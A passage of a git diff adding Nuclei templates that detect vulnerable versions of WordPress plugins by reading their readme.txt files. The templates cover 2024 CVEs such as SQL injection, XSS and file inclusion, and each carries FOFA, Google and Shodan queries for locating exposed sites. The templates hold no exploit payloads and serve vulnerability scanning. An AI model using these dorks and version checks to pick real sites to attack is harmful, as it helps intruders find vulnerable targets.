+ The FAT Services Booking plugin for WordPress is vulnerable to SQL Injection in all versions up to, and including, 5.6 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/b988a8bb-0def-4469-8f97-d329967cb11b?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
+ cvss-score: 8.6
+ cve-id: CVE-2024-54221
+ metadata:
+ fofa-query: "wp-content/plugins/fat-services-booking/"
+ google-query: inurl:"/wp-content/plugins/fat-services-booking/"
+ shodan-query: 'vuln:CVE-2024-54221'
+ tags: cve,wordpress,wp-plugin,fat-services-booking,critical
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/fat-services-booking/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "fat-services-booking"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 5.6')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-54223.yaml b/poc/cve/CVE-2024-54223.yaml
new file mode 100644
index 0000000000..e65181cf2a
--- /dev/null
+++ b/poc/cve/CVE-2024-54223.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-54223-eb5a3cfa0572e6123bd603f96e9d1ae5
+
+info:
+ name: >
+ ARForms Form Builder <= 1.7.1 - HTML Injection
+ author: topscoder
+ severity: medium
+ description: >
+ The Contact Form, Survey, Quiz & Popup Form Builder – ARForms plugin for WordPress is vulnerable to HTML Injection in all versions up to, and including, 1.7.1. This is due to the plugin not properly sanitizing and escaping data. This makes it possible for unauthenticated attackers to inject HTML elements.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/7f800bc0-5b1b-43fa-a267-d8db444d0c2c?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
+ cvss-score: 6.5
+ cve-id: CVE-2024-54223
+ metadata:
+ fofa-query: "wp-content/plugins/arforms-form-builder/"
+ google-query: inurl:"/wp-content/plugins/arforms-form-builder/"
+ shodan-query: 'vuln:CVE-2024-54223'
+ tags: cve,wordpress,wp-plugin,arforms-form-builder,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/arforms-form-builder/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "arforms-form-builder"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.7.1')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-54224.yaml b/poc/cve/CVE-2024-54224.yaml
new file mode 100644
index 0000000000..55b9eaff4b
--- /dev/null
+++ b/poc/cve/CVE-2024-54224.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-54224-633e8c33e4210ddd571311b75b795b03
+
+info:
+ name: >
+ ElementsReady Addons for Elementor <= 6.4.7 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The ElementsReady Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 6.4.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/a33c0e7e-42d3-442e-886e-e0a71cdbf628?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-54224
+ metadata:
+ fofa-query: "wp-content/plugins/element-ready-lite/"
+ google-query: inurl:"/wp-content/plugins/element-ready-lite/"
+ shodan-query: 'vuln:CVE-2024-54224'
+ tags: cve,wordpress,wp-plugin,element-ready-lite,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/element-ready-lite/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "element-ready-lite"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 6.4.7')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-54225.yaml b/poc/cve/CVE-2024-54225.yaml
new file mode 100644
index 0000000000..8b84f78595
--- /dev/null
+++ b/poc/cve/CVE-2024-54225.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-54225-865cf12d67ad4e2a12b4e760865df92d
+
+info:
+ name: >
+ Designer <= 1.3.3 - Authenticated (Contributor+) Local File Inclusion
+ author: topscoder
+ severity: low
+ description: >
+ The Designer plugin for WordPress is vulnerable to Local File Inclusion in versions up to, and including, 1.3.3. This makes it possible for authenticated attackers, with contributor-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other “safe” file types can be uploaded and included.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/47a67db6-cc0d-47d2-a2c2-11b8c410f2fb?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 8.8
+ cve-id: CVE-2024-54225
+ metadata:
+ fofa-query: "wp-content/plugins/designer/"
+ google-query: inurl:"/wp-content/plugins/designer/"
+ shodan-query: 'vuln:CVE-2024-54225'
+ tags: cve,wordpress,wp-plugin,designer,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/designer/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "designer"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.3.3')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-54226.yaml b/poc/cve/CVE-2024-54226.yaml
new file mode 100644
index 0000000000..e4101a3f0e
--- /dev/null
+++ b/poc/cve/CVE-2024-54226.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-54226-c4753fa19fce4c8a27345324e7b382cb
+
+info:
+ name: >
+ Country Blocker <= 3.2 - Cross-Site Request Forgery to Stored Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+ The Country Blocker plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.2. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/50167c70-40f3-4beb-9171-ece066d2c3de?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-54226
+ metadata:
+ fofa-query: "wp-content/plugins/country-blocker/"
+ google-query: inurl:"/wp-content/plugins/country-blocker/"
+ shodan-query: 'vuln:CVE-2024-54226'
+ tags: cve,wordpress,wp-plugin,country-blocker,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/country-blocker/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "country-blocker"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.2')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-54227.yaml b/poc/cve/CVE-2024-54227.yaml
new file mode 100644
index 0000000000..fb4775ae24
--- /dev/null
+++ b/poc/cve/CVE-2024-54227.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-54227-43c41feaa9d58f8efc0b1ce3261306a2
+
+info:
+ name: >
+ Minimum and Maximum Quantity for WooCommerce <= 2.0.0 - Missing Authorization
+ author: topscoder
+ severity: high
+ description: >
+ The Minimum and Maximum Quantity for WooCommerce plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 2.0.0. This makes it possible for unauthenticated attackers to perform an unauthorized action.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/22738841-b25c-4519-9b94-e64a3fdf6cea?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
+ cvss-score: 5.3
+ cve-id: CVE-2024-54227
+ metadata:
+ fofa-query: "wp-content/plugins/min-and-max-quantity-for-woocommerce/"
+ google-query: inurl:"/wp-content/plugins/min-and-max-quantity-for-woocommerce/"
+ shodan-query: 'vuln:CVE-2024-54227'
+ tags: cve,wordpress,wp-plugin,min-and-max-quantity-for-woocommerce,high
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/min-and-max-quantity-for-woocommerce/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "min-and-max-quantity-for-woocommerce"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.0.0')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-54228.yaml b/poc/cve/CVE-2024-54228.yaml
new file mode 100644
index 0000000000..79474b1ae3
--- /dev/null
+++ b/poc/cve/CVE-2024-54228.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-54228-d3544c5336366a751ac82c436ef933e3
+
+info:
+ name: >
+ Wot Elementor Widgets <= 1.0.1 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Wot Elementor Widgets plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.0.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/1fdb1314-5979-42bb-96dd-cc1648283c4e?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-54228
+ metadata:
+ fofa-query: "wp-content/plugins/wot-elementor-widgets/"
+ google-query: inurl:"/wp-content/plugins/wot-elementor-widgets/"
+ shodan-query: 'vuln:CVE-2024-54228'
+ tags: cve,wordpress,wp-plugin,wot-elementor-widgets,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wot-elementor-widgets/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wot-elementor-widgets"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.1')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-54230.yaml b/poc/cve/CVE-2024-54230.yaml
new file mode 100644
index 0000000000..329ab34eff
--- /dev/null
+++ b/poc/cve/CVE-2024-54230.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-54230-421f5bcea4b13be62429fcb8ab498858
+
+info:
+ name: >
+ Unlock Addons for Elementor <= 1.0.0 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Unlock Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.0.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/62f1635a-cb94-4c5e-a1f6-90a1eeb38968?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-54230
+ metadata:
+ fofa-query: "wp-content/plugins/unlock-addons-for-elementor/"
+ google-query: inurl:"/wp-content/plugins/unlock-addons-for-elementor/"
+ shodan-query: 'vuln:CVE-2024-54230'
+ tags: cve,wordpress,wp-plugin,unlock-addons-for-elementor,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/unlock-addons-for-elementor/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "unlock-addons-for-elementor"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.0')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-54231.yaml b/poc/cve/CVE-2024-54231.yaml
new file mode 100644
index 0000000000..c9154d0b85
--- /dev/null
+++ b/poc/cve/CVE-2024-54231.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-54231-427de4f60398b7e1078355b6618fa118
+
+info:
+ name: >
+ Ni WooCommerce Order Export <= 3.1.6 - Reflected Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+ The Ni WooCommerce Order Export plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in versions up to, and including, 3.1.6 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/36510335-df4c-473d-8091-ba7e070525bf?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-54231
+ metadata:
+ fofa-query: "wp-content/plugins/ni-woocommerce-order-export/"
+ google-query: inurl:"/wp-content/plugins/ni-woocommerce-order-export/"
+ shodan-query: 'vuln:CVE-2024-54231'
+ tags: cve,wordpress,wp-plugin,ni-woocommerce-order-export,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/ni-woocommerce-order-export/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "ni-woocommerce-order-export"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.1.6')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-54232.yaml b/poc/cve/CVE-2024-54232.yaml
new file mode 100644
index 0000000000..8cde7512f6
--- /dev/null
+++ b/poc/cve/CVE-2024-54232.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-54232-43abed5835eaafea250948b708d95e51
+
+info:
+ name: >
+ RRAddons for Elementor <= 1.1.0 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The RRAddons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/cdeb9625-65fa-42bd-9708-7090691aae45?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-54232
+ metadata:
+ fofa-query: "wp-content/plugins/rrdevs-for-elementor/"
+ google-query: inurl:"/wp-content/plugins/rrdevs-for-elementor/"
+ shodan-query: 'vuln:CVE-2024-54232'
+ tags: cve,wordpress,wp-plugin,rrdevs-for-elementor,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/rrdevs-for-elementor/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "rrdevs-for-elementor"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.1.0')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-54247.yaml b/poc/cve/CVE-2024-54247.yaml
new file mode 100644
index 0000000000..96d8418847
--- /dev/null
+++ b/poc/cve/CVE-2024-54247.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-54247-32dd452fd1db8cb528bb367644d98408
+
+info:
+ name: >
+ ABCBiz Addons for Elementor <= 2.0.2 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The ABCBiz Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 2.0.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/688c04b5-e5fe-4ddf-b253-2418149d9aba?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-54247
+ metadata:
+ fofa-query: "wp-content/plugins/abcbiz-addons/"
+ google-query: inurl:"/wp-content/plugins/abcbiz-addons/"
+ shodan-query: 'vuln:CVE-2024-54247'
+ tags: cve,wordpress,wp-plugin,abcbiz-addons,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/abcbiz-addons/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "abcbiz-addons"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.0.2')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-54250.yaml b/poc/cve/CVE-2024-54250.yaml
new file mode 100644
index 0000000000..7b5238b638
--- /dev/null
+++ b/poc/cve/CVE-2024-54250.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-54250-80229f33352eda0e4db54b51c9f141a7
+
+info:
+ name: >
+ Prodigy Commerce <= 3.0.8 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Prodigy Commerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 3.0.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/14b10f8e-37dd-4a34-87da-c09fdb8e09b3?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
+ cvss-score: 4.3
+ cve-id: CVE-2024-54250
+ metadata:
+ fofa-query: "wp-content/plugins/prodigy-commerce/"
+ google-query: inurl:"/wp-content/plugins/prodigy-commerce/"
+ shodan-query: 'vuln:CVE-2024-54250'
+ tags: cve,wordpress,wp-plugin,prodigy-commerce,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/prodigy-commerce/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "prodigy-commerce"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.0.8')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-54251.yaml b/poc/cve/CVE-2024-54251.yaml
new file mode 100644
index 0000000000..76a67dc4aa
--- /dev/null
+++ b/poc/cve/CVE-2024-54251.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-54251-4675c5cbd2d4490266ac6406a9506a12
+
+info:
+ name: >
+ Prodigy Commerce <= 3.0.9 - Missing Authorization
+ author: topscoder
+ severity: low
+ description: >
+ The Prodigy Commerce plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 3.0.9. This makes it possible for authenticated attackers, with Contributor-level access and above, to perform an unauthorized action.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/dea4a7f4-e075-45d9-bf71-f411f4ce30df?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
+ cvss-score: 4.3
+ cve-id: CVE-2024-54251
+ metadata:
+ fofa-query: "wp-content/plugins/prodigy-commerce/"
+ google-query: inurl:"/wp-content/plugins/prodigy-commerce/"
+ shodan-query: 'vuln:CVE-2024-54251'
+ tags: cve,wordpress,wp-plugin,prodigy-commerce,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/prodigy-commerce/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "prodigy-commerce"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.0.9')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-54253.yaml b/poc/cve/CVE-2024-54253.yaml
new file mode 100644
index 0000000000..f000a3109e
--- /dev/null
+++ b/poc/cve/CVE-2024-54253.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-54253-b4f4e0a053f49fd713057ccba10c41ab
+
+info:
+ name: >
+ 140+ Widgets | Xpro Addons For Elementor – FREE <= 1.4.6.1 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The 140+ Widgets | Xpro Addons For Elementor – FREE plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 1.4.6.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/039a9e3d-0e88-4eae-9537-58682aaf7b10?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-54253
+ metadata:
+ fofa-query: "wp-content/plugins/xpro-elementor-addons/"
+ google-query: inurl:"/wp-content/plugins/xpro-elementor-addons/"
+ shodan-query: 'vuln:CVE-2024-54253'
+ tags: cve,wordpress,wp-plugin,xpro-elementor-addons,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/xpro-elementor-addons/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "xpro-elementor-addons"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.4.6.1')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-54255.yaml b/poc/cve/CVE-2024-54255.yaml
new file mode 100644
index 0000000000..8ca4675797
--- /dev/null
+++ b/poc/cve/CVE-2024-54255.yaml
@@ -0,0 +1,59 @@ +id: CVE-2024-54255-22f20fe5fd8f58ffc816fe1d69d3dfea + +info: + name: > + Login Widget With Shortcode <= 6.1.2 - Open Redirect + author: topscoder + severity: medium + description: > + The Login Widget With Shortcode plugin for WordPress is vulnerable to Open Redirect in all versions up to, and including, 6.1.2. This is due to insufficient validation on the redirect url supplied. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites if they can successfully trick them into performing an action. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/9ce819fa-5c94-4116-9361-1de24619c27b?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-54255 + metadata: + fofa-query: "wp-content/plugins/login-sidebar-widget/" + google-query: inurl:"/wp-content/plugins/login-sidebar-widget/" + shodan-query: 'vuln:CVE-2024-54255' + tags: cve,wordpress,wp-plugin,login-sidebar-widget,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/login-sidebar-widget/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "login-sidebar-widget" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 6.1.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-54260.yaml b/poc/cve/CVE-2024-54260.yaml new file mode 100644 index 0000000000..413ee432a1 --- /dev/null +++ b/poc/cve/CVE-2024-54260.yaml 
